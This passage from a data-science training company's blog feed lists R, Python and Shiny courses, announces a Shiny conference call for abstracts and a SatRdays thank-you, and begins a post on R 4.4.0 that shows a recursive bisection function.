&lt;p&gt;&lt;strong&gt;Course Level: Intermediate&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Upcoming course dates: 22nd July, 4th November&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;Want to learn how to effectively visualise your data in R using the elegant {ggplot2} package? With {ggplot2} it’s easy to customise everything from plot layouts and themes to scales, colours, and more! This course will comprehensively take you through basic plot types such as bar and line charts as well as cover more advanced topics such as interactive graphics with {plotly}.&lt;/p&gt;
&lt;h4 id="r-best-practices"&gt;&lt;a href="https://www.jumpingrivers.com/training/course/r-best-practices/" rel="external"&gt;R Best Practices&lt;/a&gt;&lt;/h4&gt;
&lt;p&gt;&lt;strong&gt;Course Level: Intermediate&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Upcoming course dates: 22nd July&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;So you can write code? Great. But can you write code which is easy to read, simple to maintain, and reproducible? Under the pressure of deadlines even the best of us can fall victim to bad-practices. In this course we motivate the importance of good-practices, and show how we can make best practices second nature by incorporating them into our normal workflow.&lt;/p&gt;
&lt;h4 id="object-oriented-programming-in-r"&gt;&lt;a href="https://www.jumpingrivers.com/training/course/oop-s3-s4-r6-classes/" rel="external"&gt;Object Oriented Programming in R&lt;/a&gt;&lt;/h4&gt;
&lt;p&gt;&lt;strong&gt;Course Level: Advanced&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Upcoming course dates: 15th July&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;The training course will cover R object-oriented programming techniques. We’ll discuss what OOP is and the different varieties within R. Beginning with the popular S3 and S4 OOP frameworks, we’ll finish with the new {R6} package that is used extensively in Shiny applications. By the end of the course, participants will be able to use OOP within their own code.&lt;/p&gt;
&lt;hr&gt;
&lt;h3 id="shiny"&gt;Shiny&lt;/h3&gt;
&lt;h4 id="introduction-to-shiny"&gt;&lt;a href="https://www.jumpingrivers.com/training/course/r-introduction-shiny-application-web/" rel="external"&gt;Introduction to Shiny&lt;/a&gt;&lt;/h4&gt;
&lt;p&gt;&lt;strong&gt;Course Level: Intermediate&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Upcoming course dates: 10th July, 7th October&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;Do you want to provide interactive visualisation and data exploration features for users who do not have R and data science skills? Discover how easy it can be to use R and {shiny} to create your own apps and dashboards for exploring data without relying on web development or external BI tools. We will show you various examples of input widgets and outputs to display tables and visualisations.&lt;/p&gt;
&lt;h4 id="advanced-concepts-in-shiny"&gt;&lt;a href="https://www.jumpingrivers.com/training/course/advanced-shiny/" rel="external"&gt;Advanced Concepts in Shiny&lt;/a&gt;&lt;/h4&gt;
&lt;p&gt;&lt;strong&gt;Course Level: Advanced&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Upcoming course dates: 23rd September, 14th October&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;Take your interactive {shiny} skills to the next level by creating more robust, responsive and maintainable applications. In this course, we’ll visit more advanced topics that can be used to improve the experience for both those producing the apps and those using them. Subjects will cover: additional ways to react to and validate user inputs; restructuring your app with modules; and an introduction to testing your {shiny} apps.&lt;/p&gt;
&lt;hr&gt;
&lt;h3 id="python"&gt;Python&lt;/h3&gt;
&lt;h4 id="introduction-to-python"&gt;&lt;a href="https://www.jumpingrivers.com/training/course/python-introduction-visualisation-manipulation/" rel="external"&gt;Introduction to Python&lt;/a&gt;&lt;/h4&gt;
&lt;p&gt;&lt;strong&gt;Course Level: Foundation&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Upcoming course dates: 9th September, 14th October&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;Python is a general-purpose programming language popular among data scientists and statisticians. In this one-day introductory course, participants will learn to import, summarise and visualise their data. At each step, we avoid using “magic code”, and stress the importance of understanding what Python is doing.&lt;/p&gt;
&lt;h4 id="programming-with-python"&gt;&lt;a href="https://www.jumpingrivers.com/training/course/python-programming-control-flow-functions/" rel="external"&gt;Programming with Python&lt;/a&gt;&lt;/h4&gt;
&lt;p&gt;&lt;strong&gt;Course Level: Intermediate&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Upcoming course dates: 16th September, 23rd October&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;The benefit of using a programming language such as Python is that we can automate repetitive tasks. This course covers the fundamental techniques such as functions, for loops and conditional expressions. By the end of this course, you will understand what these techniques are and how they can be applied to solve real-world data wrangling tasks.&lt;/p&gt;
&lt;h4 id="data-visualisation-with-python"&gt;&lt;a href="https://www.jumpingrivers.com/training/course/python-matplotlib-seaborn-visualisation/" rel="external"&gt;Data Visualisation with Python&lt;/a&gt;&lt;/h4&gt;
&lt;p&gt;&lt;strong&gt;Course Level: Intermediate&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Upcoming course dates: 17th June, 23rd September, 11th November&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;Python has a number of packages for the effective creation of graphics to communicate your data insights. This course will examine two popular libraries for creating static 2D plots: Matplotlib and Seaborn. During the training session, we’ll cover plotting basics and customisation of figures with Matplotlib, before moving onto complex statistical visualisations with Seaborn.&lt;/p&gt;
&lt;h4 id="python-best-practices"&gt;&lt;a href="https://www.jumpingrivers.com/training/course/python-best-practices/" rel="external"&gt;Python Best Practices&lt;/a&gt;&lt;/h4&gt;
&lt;p&gt;&lt;strong&gt;Course Level: Intermediate&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Upcoming course dates: 22nd July&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;So you can write code? Great. But can you write code which is easy to read, simple to maintain, and reproducible? Under the pressure of deadlines even the best of us can fall victim to bad-practices. In this course we motivate the importance of good-practices, and show how we can make best practices second nature by incorporating them into our normal workflow.&lt;/p&gt;
&lt;hr&gt;
&lt;h3 id="reporting"&gt;Reporting&lt;/h3&gt;
&lt;h4 id="reporting-with-quarto"&gt;&lt;a href="https://www.jumpingrivers.com/training/course/reporting-with-quarto/" rel="external"&gt;Reporting with Quarto&lt;/a&gt;&lt;/h4&gt;
&lt;p&gt;&lt;strong&gt;Course Level: Intermediate&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Upcoming course dates: 24th June, 23rd September, 18th November&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;Do you create interactive documents that always need to be updated when the data changes? Then this course is for you. In this course you will learn how to use Quarto to create high quality, dynamic, fully reproducible documents. Quarto is a multi-language open source publishing tool that allows for the creation of dynamic content with Python, R, Julia and Observable.&lt;/p&gt;
&lt;hr&gt;
&lt;h3 id="machine-learning"&gt;Machine Learning&lt;/h3&gt;
&lt;h4 id="machine-learning-with-tidymodels"&gt;&lt;a href="https://www.jumpingrivers.com/training/course/r-prediction-inference-analytics-machine-learning-tidymodels/" rel="external"&gt;Machine Learning with Tidymodels&lt;/a&gt;&lt;/h4&gt;
&lt;p&gt;&lt;strong&gt;Course Level: Intermediate&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Upcoming course dates: 16th September, 11th November&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;Machine learning is the process of applying statistical techniques to gain systematic information about a quantity of interest. We will be specifically focusing on how we can use the {tidymodels} suite of packages to implement these techniques. We cover key reasons for model fitting, such as prediction and inference, on quantitative and qualitative responses.&lt;/p&gt;
&lt;h4 id="advanced-machine-learning-with-tidymodels"&gt;&lt;a href="https://www.jumpingrivers.com/training/course/r-prediction-inference-tidymodels-lda-pre-processing-tree-based-models/" rel="external"&gt;Advanced Machine Learning with Tidymodels&lt;/a&gt;&lt;/h4&gt;
&lt;p&gt;&lt;strong&gt;Course Level: Advanced&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Upcoming course dates: 23rd September, 18th November&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;A course that builds on the material covered in our Machine Learning with Tidymodels course. We take a look at how we can fit linear discriminant analysis (LDA) models using {discrim}, assessing model reliability using V-fold cross validation, pre-processing, tree-based models &amp;amp; more. If you wish to explore the abundance of model fitting techniques {tidymodels} has to offer, then this course is certainly for you!&lt;/p&gt;
&lt;hr&gt;
&lt;h3 id="sql"&gt;SQL&lt;/h3&gt;
&lt;h4 id="an-introduction-to-sql-with-r"&gt;&lt;a href="https://www.jumpingrivers.com/training/course/r-sql-databases-aggregation/" rel="external"&gt;An Introduction to SQL with R&lt;/a&gt;&lt;/h4&gt;
&lt;p&gt;&lt;strong&gt;Course Level: Intermediate&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Upcoming course dates: 2nd October&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;Using databases is a fundamental part of a data scientist’s role. The main focus of this training course is to introduce SQL databases, write your first SQL queries, and show how R can be used to retrieve and manipulate data stored in a relational database. The course uses both the {DBI} and {dbplyr} packages.&lt;/p&gt;
&lt;p&gt;We use the PostgreSQL database as an example for public courses. For in-house training, we are happy to adapt the course to match your database requirements.&lt;/p&gt;
&lt;h4 id="introduction-to-sql-with-python"&gt;&lt;a href="https://www.jumpingrivers.com/training/course/python-sql-databases-pandas-sqlalchemy/" rel="external"&gt;Introduction to SQL with Python&lt;/a&gt;&lt;/h4&gt;
&lt;p&gt;&lt;strong&gt;Course Level: Intermediate&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Upcoming course dates: 2nd October&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;Using databases is a fundamental part of a data scientist’s role. This training course introduces SQL databases and the SQL command syntax, and shows how Python can be used to retrieve and manipulate data held in a relational database. The course also discusses how SQLAlchemy can be used to define and interact with databases using object-oriented Python code.&lt;/p&gt;
&lt;p&gt;We use a PostgreSQL database as an example, and communicate with this using a psycopg2 connection.&lt;/p&gt;
&lt;hr&gt;
&lt;h3 id="statistics"&gt;Statistics&lt;/h3&gt;
&lt;h4 id="statistical-modelling-with-r"&gt;&lt;a href="https://www.jumpingrivers.com/training/course/r-statistics-modelling-linear-regression-clustering/" rel="external"&gt;Statistical Modelling with R&lt;/a&gt;&lt;/h4&gt;
&lt;p&gt;&lt;strong&gt;Course Level: Intermediate&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Upcoming course dates: 9th September, 23rd October&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;From the very beginning, R was designed for statistical modelling. Out of the box, R makes standard statistical techniques easy. This course covers the fundamental modelling techniques. We begin the day by revising hypotheses tests, before moving onto ANOVA tables and regression analysis. The class ends by looking at more sophisticated methods such as clustering and principal components analysis (PCA).&lt;/p&gt;
&lt;h4 id="introduction-to-bayesian-inference-using-rstan"&gt;&lt;a href="https://www.jumpingrivers.com/training/course/introduction-bayesian-inference-rstan-monte-carlo/" rel="external"&gt;Introduction to Bayesian Inference using RStan&lt;/a&gt;&lt;/h4&gt;
&lt;p&gt;&lt;strong&gt;Course Level: Intermediate&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Upcoming course dates: 1st July, 14th October&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;Despite the promise of big data, inferences are often limited by its systematic structure. Only by carefully modelling this structure can we take full advantage of the data. Stan is a platform for facilitating this modelling, providing an expressive modelling language to implement state-of-the-art algorithms, to draw subsequent Bayesian inferences. This course will teach participants how to interface with Stan through R!&lt;/p&gt;
&lt;h4 id="introduction-to-bayesian-inference-using-pystan"&gt;&lt;a href="https://www.jumpingrivers.com/training/course/introduction-bayesian-inference-pystan-monte-carlo/" rel="external"&gt;Introduction to Bayesian Inference using PyStan&lt;/a&gt;&lt;/h4&gt;
&lt;p&gt;&lt;strong&gt;Course Level: Intermediate&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Upcoming course dates: 15th July, 21st October&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;Despite the promise of big data, inferences are often limited by its systematic structure. Only by carefully modelling this structure can we take full advantage of the data. Stan is a platform for facilitating this modelling, providing an expressive modelling language to implement state-of-the-art algorithms, to draw subsequent Bayesian inferences.&lt;/p&gt;
&lt;p&gt;The course will teach participants how to interface with Stan through Python!&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/june-2024-training-update-r-python-statistical-modelling-shiny-visualisation-wrangling/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Shiny in Production 2024: Call for Abstracts</title><link>https://www.jumpingrivers.com/blog/shiny-in-production-2024-r-events-call-for-abstracts/</link><pubDate>Thu, 30 May 2024 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/shiny-in-production-2024-r-events-call-for-abstracts/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/shiny-in-production-2024-r-events-call-for-abstracts/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/shiny-in-production-2024-r-events-call-for-abstracts/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;h3 id="call-for-abstracts-now-open"&gt;Call for abstracts now open&lt;/h3&gt;
&lt;p&gt;We are excited to announce the Call for Abstracts for &lt;a href="https://shiny-in-production.jumpingrivers.com/" rel="external"&gt;Shiny in Production 2024&lt;/a&gt;, to be held on 9th-10th October 2024 in Newcastle upon Tyne, UK. This event brings together industry experts, data scientists, and developers to explore the latest advancements and best practices in deploying Shiny applications in production settings.&lt;/p&gt;
&lt;h3 id="about-the-conference"&gt;About the Conference&lt;/h3&gt;
&lt;p&gt;As Shiny continues to revolutionise data visualisation and interactive web applications, the need for robust, scalable, and efficient production environments is more critical than ever. This conference aims to address these needs by providing a platform for knowledge sharing, collaboration, and innovation.&lt;/p&gt;
&lt;p&gt;Whether you’re a seasoned {shiny} user who wants to network and share knowledge, someone who’s just getting started and wants to learn from the experts, or anybody in between, if you’re interested in {shiny}, this conference is for you.&lt;/p&gt;
&lt;h3 id="topics-of-interest"&gt;Topics of Interest&lt;/h3&gt;
&lt;p&gt;We invite abstracts on a wide range of topics, including but not limited to:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Scalable Architectures:&lt;/strong&gt; Techniques for scaling Shiny applications to handle large datasets and high user loads.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Security Best Practices:&lt;/strong&gt; Ensuring the security and privacy of data within Shiny applications.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Performance Optimisation:&lt;/strong&gt; Strategies for improving the speed and responsiveness of Shiny apps.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Integration with Other Technologies:&lt;/strong&gt; Combining Shiny with other tools and platforms for enhanced functionality.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Python:&lt;/strong&gt; Developing Python Shiny apps&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Case Studies:&lt;/strong&gt; Real-world examples of successful Shiny deployments in various industries.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Automated Testing and Continuous Deployment:&lt;/strong&gt; Best practices for maintaining high-quality applications through automated workflows.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;To get an idea of past topics, check out our YouTube channel, where we have playlists of talks from Shiny in Production &lt;a href="https://youtube.com/playlist?list=PLbARZQfpqIKJ6Un06aThcKJC7eQMSgKRD&amp;si=b2GWgsZ-k5WC8QAD" rel="external"&gt;2022&lt;/a&gt; and &lt;a href="https://youtube.com/playlist?list=PLbARZQfpqIKJcO4Srr6mnQorL3wFhiV7t&amp;si=BGLJYKWc5ZIGwrUZ" rel="external"&gt;2023&lt;/a&gt;.&lt;/p&gt;
&lt;h3 id="submission-guidelines"&gt;Submission Guidelines&lt;/h3&gt;
&lt;p&gt;To submit your abstract, please follow these guidelines:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Abstract Length: Up to 250 words.&lt;/li&gt;
&lt;li&gt;Deadline: Submissions must be received by 11:59 on 30th June 2024.&lt;/li&gt;
&lt;li&gt;Submission Portal: Submit your abstract &lt;a href="https://jumpingrivers.typeform.com/to/nxa2aCZ5" rel="external"&gt;here&lt;/a&gt;.&lt;/li&gt;
&lt;/ul&gt;
&lt;h3 id="important-dates"&gt;Important Dates&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;Abstract Submission Deadline: 30th June 2024&lt;/li&gt;
&lt;li&gt;Notification of Acceptance: 1st August 2024&lt;/li&gt;
&lt;li&gt;Conference Dates: 9th-10th October 2024&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;For more information, visit our &lt;a href="https://shiny-in-production.jumpingrivers.com/" rel="external"&gt;conference website&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/shiny-in-production-2024-r-events-call-for-abstracts/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>SatRdays London 2024: Thanks for coming!</title><link>https://www.jumpingrivers.com/blog/satrdays-london-2024-thanks-for-coming-r-conference/</link><pubDate>Thu, 09 May 2024 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/satrdays-london-2024-thanks-for-coming-r-conference/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/satrdays-london-2024-thanks-for-coming-r-conference/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/satrdays-london-2024-thanks-for-coming-r-conference/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;We wanted to say a huge thank you to everybody who attended &lt;a href="https://satrdays-london-2024.jumpingrivers.com/" rel="external"&gt;SatRdays London 2024&lt;/a&gt;! It was brilliant to see you all there, and we hope you enjoyed the day as much as we did. Thank you to all of our speakers for your contributions, it was great to see such a range of talks and hear about the different ways you can use R in your fields.&lt;/p&gt;
&lt;p&gt;Of course the day wouldn&amp;rsquo;t have been the same without our generous sponsors, so we want to say a huge thank you to &lt;a href="https://cusplondon.ac.uk/" rel="external"&gt;CUSP London&lt;/a&gt; for providing the excellent venue, as well as &lt;a href="https://www.r-consortium.org/" rel="external"&gt;R Consortium&lt;/a&gt; for your generous support.&lt;/p&gt;
&lt;p&gt;Couldn&amp;rsquo;t make it on the day? Keep your eyes peeled on our blog and social media, as we&amp;rsquo;ll be releasing recordings of the talks on our &lt;a href="https://youtube.com/@jumping-rivers?si=zmnW9WVphdZkl-8f" rel="external"&gt;YouTube channel&lt;/a&gt; in the coming months. Can&amp;rsquo;t wait that long? Check out &lt;a href="https://youtube.com/playlist?list=PLbARZQfpqIKLNjt5NnVQ1RgEKeayVVv6G&amp;si=gxRtQ_9fDTzjVR0c" rel="external"&gt;last year&amp;rsquo;s SatRdays London recordings&lt;/a&gt; as well as those from our Shiny in Production conference from &lt;a href="https://youtube.com/playlist?list=PLbARZQfpqIKJ6Un06aThcKJC7eQMSgKRD&amp;si=i7_xoeVI7o-FRm_9" rel="external"&gt;2022&lt;/a&gt; and &lt;a href="https://www.youtube.com/playlist?list=PLbARZQfpqIKJcO4Srr6mnQorL3wFhiV7t" rel="external"&gt;2023&lt;/a&gt;.&lt;/p&gt;
&lt;h3 id="whats-next"&gt;What&amp;rsquo;s next?&lt;/h3&gt;
&lt;p&gt;Registration is now open for &lt;a href="https://shiny-in-production.jumpingrivers.com/" rel="external"&gt;Shiny in Production 2024&lt;/a&gt;! This event consists of an afternoon of Shiny based workshops including:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Level Up Your Plots with Cara Thompson&lt;/li&gt;
&lt;li&gt;Building Responsive Shiny Apps&lt;/li&gt;
&lt;li&gt;Asynchronous Shiny&lt;/li&gt;
&lt;li&gt;Building Apps for Humans&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Followed by a day of talks from Shiny experts across a variety of industries. If you&amp;rsquo;re interested in submitting an abstract, head over to the &lt;a href="https://shiny-in-production.jumpingrivers.com/" rel="external"&gt;conference website&lt;/a&gt; now. Submissions are open until 30th June!&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/satrdays-london-2024-thanks-for-coming-r-conference/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>What's new in R 4.4.0?</title><link>https://www.jumpingrivers.com/blog/whats-new-r44/</link><pubDate>Thu, 25 Apr 2024 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/whats-new-r44/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/whats-new-r44/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/whats-new-r44/featured.jpg " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;!--- Introduction --&gt;
&lt;p&gt;R 4.4.0 (“Puppy Cup”) was released on the 24th April 2024 and it is a
beauty. In time-honoured tradition, here we summarise some of the
changes that caught our eyes. R 4.4.0 introduces some cool features (one
of which is experimental) and makes one of our favourite {rlang}
operators available in base R. There are a few things you might need to
be aware of regarding handling &lt;code&gt;NULL&lt;/code&gt; and &lt;code&gt;complex&lt;/code&gt; values.&lt;/p&gt;
&lt;p&gt;The full changelog can be found at the &lt;a href="https://cran.r-project.org/doc/manuals/r-release/NEWS.html" rel="external"&gt;r-release ‘NEWS’
page&lt;/a&gt; and if
you want to keep up to date with developments in base R, have a look at
the &lt;a href="https://cran.r-project.org/doc/manuals/r-devel/NEWS.html" rel="external"&gt;r-devel ‘NEWS’
page&lt;/a&gt;.&lt;/p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Data comes in all shapes and sizes. It can often be difficult to know where to start. Whatever your problem, &lt;a href="https://www.jumpingrivers.com/consultancy/data-science-machine-learning/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2024-whats-new-r44"&gt;Jumping Rivers can help&lt;/a&gt;.
&lt;/p&gt;
&lt;/aside&gt;
&lt;h3 id="a-tail-recursive-tale"&gt;A tail-recursive tale&lt;/h3&gt;
&lt;p&gt;Years ago, before I’d caused my first stack overflow, my Grandad used to
tell me a daft tale:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;It was on a dark and stormy night,
And the skipper of the yacht said to Antonio,
&amp;quot;Antonio, tell us a tale&amp;quot;,
So Antonio started as follows...
It was on a dark and stormy night,
And the skipper of the yacht .... [ad infinitum]
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The tale carried on in this way forever. Or at least it would until you
were finally asleep.&lt;/p&gt;
&lt;p&gt;At around the same age, I was toying with BASIC programming and could
knock out classics such as&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;gt;10 PRINT &amp;quot;Ali stinks!&amp;quot;
&amp;gt;20 GOTO 10
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Burn! Infinite burn!&lt;/p&gt;
&lt;p&gt;That was two example processes that demonstrate recursion. Antonio’s
tale quotes itself recursively, and my older brother will be repeatedly
mocked unless someone intervenes.&lt;/p&gt;
&lt;p&gt;Recursion is an elegant approach to many programming problems - this
usually takes the form of a function that can call itself. You would use
it when you know how to get closer to a solution, but not necessarily
how to get directly to that solution. And unlike the un-ending examples
above, when we write recursive solutions to computational problems, we
include a rule for stopping.&lt;/p&gt;
&lt;p&gt;An example from mathematics would be finding zeros for a continuous
function. The sine function provides a typical example:&lt;/p&gt;
&lt;img src="https://www.jumpingrivers.com/blog/whats-new-r44/sine-curve-1.svg" alt="Graph of the sine function between 0 and 2*pi" width="50%" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;p&gt;We can see that when &lt;em&gt;x&lt;/em&gt; = &lt;em&gt;π&lt;/em&gt;, there is a zero for &lt;code&gt;sin(x)&lt;/code&gt;, but the
computer doesn’t know that.&lt;/p&gt;
&lt;p&gt;One recursive solution to finding the zeros of a function, &lt;code&gt;f()&lt;/code&gt;, is the
&lt;a href="https://en.wikipedia.org/wiki/Bisection_method" rel="external"&gt;bisection method&lt;/a&gt;,
which iteratively narrows a range until it finds a point where &lt;code&gt;f(x)&lt;/code&gt; is
close enough to zero. Here’s a quick implementation of that algorithm.
If you need to perform root-finding in R, please don’t use the following
function. &lt;code&gt;stats::uniroot()&lt;/code&gt; is much more robust…&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;bisect &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;function&lt;/span&gt;(f, interval, tolerance, iteration &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;, verbose &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;FALSE&lt;/span&gt;) {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;if&lt;/span&gt; (verbose) {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; msg &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; glue&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;glue&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Iteration {iteration}: Interval [{interval[1]}, {interval[2]}]&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; )
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;message&lt;/span&gt;(msg)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; }
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# Evaluate &amp;#39;f&amp;#39; at either end of the interval and return&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# any endpoint where f() is close enough to zero&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; lhs &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; interval[1]; rhs &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; interval[2]
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; f_left &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;f&lt;/span&gt;(lhs); f_right &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;f&lt;/span&gt;(rhs)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;if&lt;/span&gt; (&lt;span style="color:#d2a8ff;font-weight:bold"&gt;abs&lt;/span&gt;(f_left) &lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;lt;=&lt;/span&gt; tolerance) {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;return&lt;/span&gt;(lhs)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; }
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;if&lt;/span&gt; (&lt;span style="color:#d2a8ff;font-weight:bold"&gt;abs&lt;/span&gt;(f_right) &lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;lt;=&lt;/span&gt; tolerance) {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;return&lt;/span&gt;(rhs)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; }
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;stopifnot&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;sign&lt;/span&gt;(f_left) &lt;span style="color:#ff7b72;font-weight:bold"&gt;!=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;sign&lt;/span&gt;(f_right))
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# Bisect the interval and rerun the algorithm&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# on the half-interval where y=0 is crossed&lt;/span&gt;
